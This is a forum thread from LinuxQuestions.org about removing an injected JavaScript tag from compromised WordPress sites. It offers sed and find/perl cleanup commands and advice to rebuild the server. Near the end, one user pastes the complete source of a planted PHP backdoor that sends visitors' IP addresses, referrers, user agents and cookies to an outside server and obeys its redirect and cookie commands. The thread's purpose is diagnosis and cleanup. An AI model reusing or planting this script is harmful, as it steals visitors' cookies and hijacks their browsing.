LinuxQuestions.org - SSH Command to do mass search and replace

- Linux - General (https://www.linuxquestions.org/questions/linux-general-1/)

- - SSH Command to do mass search and replace (https://www.linuxquestions.org/questions/linux-general-1/ssh-command-to-do-mass-search-and-replace-4175457500/)

SSH Command to do mass search and replace

Hi everyone, new here :)

Thanks to the kind works of a hacker, I have hundreds of files I need to remove the following from

<script language="JavaScript" src="http://abtt.tv/modules/mod_servises/ua.js" type="text/javascript"></script>

Is there a quick and easy way to do this through SSH

Any help much appreciated !

let me get this straight that command is in a number of different files, or is in one file a number of times?

If it is a number of files, then sadly they each need to be touched.

If it is in one file a bunch of times, then any editor, txt or otherwise, should be able to handle find/replace options for you.

Quote:

Originally Posted by ryedaleblue (Post 4928255)

Hi everyone, new here :)
Thanks to the kind works of a hacker, I have hundreds of files I need to remove the following from

Code:

<script language="JavaScript" src="http://abtt.tv/modules/mod_servises/ua.js" type="text/javascript"></script>

Is there a quick and easy way to do this through SSH. Any help much appreciated !

A few key points need to be made first:

If your system was compromised, then just removing some lines (ostensibly from web pages) is pointless. You need to totally rebuild your box from the ground up, with EVERYTHING clean, then harden the box THOROUGHLY, before putting any of your data back. If you don't want to rebuild, then you need to audit EVERYTHING...VERY carefully, before putting things back online.
SSH is only a service, providing terminal access and file transfer capabilities. It doesn't do ANY text editing in and of itself.

The sed command can do this in one of two ways. You don't say anything about the version/distro of Linux you're using, but if your version of sed supports the "-i" flag, you can do:

Code:

sed -i.bak '/<whatever>/d' *

..for in-place editing. Or, you can just bang it into a small shell script:

Code:

for file in $(ls <file pattern>)

do

sed '/<whatever>/d' $file > $file.new_file

done

...then you have backup copies of the old files, and new files that you can easily rename.

Hi

Many thanks for help

For reference after many hours puzzling over it, this worked fine

find . -type f | xargs perl -pi -e 's/<script language=\"JavaScript" src=\"http:\/\/abtt.tv\/modules\/mod_servises\/ua.js\" type=\"text\/javascript\"><\/script>//g'

I found the original source of the infection which was an outdated WP Plugin. That had allowed uploading of a file which scanned all other files and whereever it found a </head> tag, it inserted that line of JS before it

Thanks

You need the additional protection that RH puts on the apache web server... (SELinux mandatory access controls).

With it, you can label static files as read only, even to the apache server that may own the files...

outdated WP plugin

Hi ryedaleblue,
Yesterday I found exactly the same javascript code that infected my sites.

My server hosts some joomla installations and only one of WP.

Can you please tell me what was exactly the outdated WP plugin that compromised your site?

It seems this malicious url is quite new, can't find much info on that on internet, I found just your post.

thank you in advance

Hi Rizlo

Unfortunately, I've not been able to pinpoint it exactly. The infection occurred in a domain that has 15 Word press subdomains for mini sites

The infection then spread through all sites looking for all </head> tags and inserting that line

I downloaded all the filesand my anti virus picked up on a couple of hack files that had been uploaded but they weren't in a specific plugin folder

I've seperated all the subdomains off into their own accounts on the server now to keep it isolated and updated all plugins on all of them

If you run that code I've put above by using SSH and navigating to the root folder for your site , that should clear it out

you may get some warning messages about it not being able to open certain files but it seems to clear through all text files ok

Hope this helps

Hey guys I have the exact same problem, infected all WP installations on my server by adding that same tag to my <head> before the closing tag. It seems to have wrote it four times about to each file now. Maybe we can get together and compare plugins to pinpoint which one it is or something to find an official solution? As the previous gentleman stated, it is a fairly new exploit and are no fixes that I've seen besides this one. Do I just login through my main domains Cpanel then go to SSH and paste this command?

Thanks in advance!

Yep

I just navigated to public_html then ran that

it worked fine for me but you may want to take a back up first!

It seems to be spreading so I'd certainly be interested to find out what is getting expolited

Thanks

When my hosting company did a security audit on my hosting account, they said there was only one thing found malicious in a folder called toolbox...I've since deleted the folder which was a WP theme... but don't think that was the issue as it still seems to exist. I'm going to list a few current plugins that were installed by myself and a co worker recently (so maybe you guys can compare to your list of suspected plugins) and we can hunt the sucker down.

Only other ways I can think of hunting the issue down, is doxing the domain the file is hosted on (the .js) and comparing the information found to Wordpress plugin authors.

Wish I knew a way of monitoring which files are writing code to others, that would solve the problem almost immediately, lol.

I run ConfigScanner's expolit scan service on my server which is usually very quick at detecting hacks and quarantining them as soon as they are loaded into memory but it missed this one, probably because it's so new and maybe also because it doesn't seem to do anything other than insert that line (as far I've seen)

Yes I had the toolbox folder as well

Odd, I deleted the toolbox folder, but it appears one file won't delete. Hrm.. any ideas on your end if this is the folder causing the issue? The file is wp-status.php - It won't let me delete, edit or even view the file..tried CHmodding it and everything..not sure what to do. Wonder if this is the cause of the issue?

Quote:

Originally Posted by viryoulent (Post 4931774)

What is your system?

For that file, you might check to see if it is marked "immutable". If it is, you need to replace the entire system as the only way that could have been set is by root.

And if it isn't RH based with SELinux enabled, you do have a problem. The RH based SELinux security models compartmentalize apache such that penetrations are confined to just files apache can write/update, with no access to system files or configuration files.

That file that wouldn't let me remove it, I finally got my host to edit permissions on it so I was able to view/remove it. This is what the file code contained not sure if a PHP guru can decode it to see if this is actually the cause of the issue thats writing the script tag to each file containing the head? If not then the toolbox folder can't be the cause because that's the only file that remains in the directory now.

PHP Code:

Code:

<?php

$tds="http://sydinex.net/TDS.post.php";

$tdsip="94.250.251.43";

$lin="";

$esdid="any";

$key="gfinberw8gjyu9djru47slbn47quf8oytuh7gdrs";

?>

<?php

//ConfGui

error_reporting(0);

$mode=$_GET["mode"];if($mode=="config" AND $key==$_GET['key']){

echo '<form name="form1" method="post" action=http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'?mode=setconfig&key='.$_GET['key'].'>

<table border="0"><tr><td>TDS</td><td><input type="text" name="ptds" value="'.$tds.'"></td><td>TDS IP</td>

<td><input type="text" name="ptdsip" value="'.$tdsip.'"></td><td>KEY</td><td><input type="text" name="pkey" value="'.$key.'"></td>

</tr><tr><td>Reserve</td><td><input type="text" name="pto" value="'.$lin.'"></td><td>ESD ID</td><td><input type="text" name="pesdid" value="'.$esdid.'"></td>

<td colspan="2"><input type="submit" name="Submit" value="ok"></td></tr></table></form>';die();}if($mode=="setconfig" AND $key==$_GET['key']){

$sn=explode("/", $_SERVER['SCRIPT_NAME']);foreach($sn as $snn){$scr=$snn;}

        $getlpa=file($scr);

        $strng=$getlpa[0];

$file=file($scr); 

for($i=0;$i<sizeof($file);$i++)

if($i==0) {

$ka='<?//BRE';$kaka=$ka.'ACK//?>';

$felp = explode($kaka, $file[$i]);

$file[$i]='<?$tds="'.$_POST["ptds"].'";$tdsip="'.$_POST["ptdsip"].'";$lin="'.$_POST["pto"].'";$esdid="'.$_POST["pesdid"].'";$key="'.$_POST["pkey"].'";?>'.$kaka.$felp[1];

}

$fp=fopen($scr,"w"); 

fputs($fp,implode("",$file)); 

fclose($fp);

}

//send

$dom = explode("/", $tds);$dom=$dom[2];$dhost=$dom;if($tdsip){$dom=$tdsip;}

$fp = fsockopen($dom, 80, $errno, $errstr, 2);

if (!$fp) {$res=1;} else {

$t_dom=urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']);

$t_ref=urlencode($_SERVER[HTTP_REFERER]);

$t_ip=urlencode($_SERVER["REMOTE_ADDR"]);

$t_prox='no';if($_SERVER["HTTP_X_FORWARDED_FOR"]){$t_prox='yes';}

$t_agent=urlencode($_SERVER['HTTP_USER_AGENT']);

foreach($_COOKIE as $key=>$val) {$t_cookie=$t_cookie."&".$key."=".$val;}$t_cookie=urlencode($t_cookie);

if(empty($t_cookie)){$t_cookie=urlencode($_SERVER['QUERY_STRING']);}

    $out = "GET ".$tds."?dom=".$t_dom."&ref=".$t_ref."&ip=".$t_ip."&prox=".$t_prox."&agent=".$t_agent."&cookie=".$t_cookie."&esdid=".$esdid." HTTP/1.0\r\n";

    $out .= "Host: ".$dhost."\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);        

while (!feof($fp)) {$str=fgets($fp,128);$ch.=$str;if ($str=="\r\n" && empty($he)){$he = 'do';}if ($he=='do'){$goto.=$str;}}fclose ($fp);}$goto=substr($goto, 2);        

$ch=explode(" ", $ch);if($res){$goto=$lin;}if($ch[1]=='200'){}else{$goto=$lin;}$gotoe = explode("://", $goto);

If($gotoe[0]=='http'){header('HTTP/1.1 302 Found');header('Location: '.$goto);} $goto_body=substr($goto,7);

If($gotoe[0]=='cook'){$gotoee=explode("&", $goto_body);foreach($gotoee as $setcook){$set=explode("=", $setcook);setcookie($set[0], $set[1]);}}

If($gotoe[0]=='echo'){echo $goto_body;}

?>

After going through it I'm pretty confident in saying that this is the cause of the issue, and once it's removed and the shell command is run it should be fine.